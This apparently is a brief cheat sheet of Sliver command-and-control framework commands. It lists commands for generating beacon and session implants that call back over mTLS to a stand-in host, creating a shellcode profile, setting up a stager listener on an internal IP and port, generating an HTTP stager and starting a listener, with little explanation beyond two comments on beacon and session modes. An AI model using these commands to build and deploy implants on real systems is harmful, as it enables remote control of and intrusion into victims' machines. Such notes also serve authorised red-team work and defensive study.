Skip to content

Sliver

Sliver

Generate Beacon:

#Beacon mode implements an asynchronous communication style where the implant periodically checks in with the server retrieves tasks, executes them, and returns the results.
generate beacon  --mtls example.com --save /Users/moloch/Desktop

Generate Session:

#In "session mode" the implant will create an interactive real time session using either a persistent connection or using long polling depending on the underlying C2 protocol.
generate --mtls example.com --save /Users/moloch/Desktop --os [mac,windows,linux,ios,android]

Make a new Profile:

profiles new --mtls 192.168.111.166
stage-listner --url http://192.168.111.166:9001 --profile win-shellcode
generate stager --lhost 192.168.111.166 --lport 9001 --protocol http --save /tmp

Start Listener:

mtls
jobs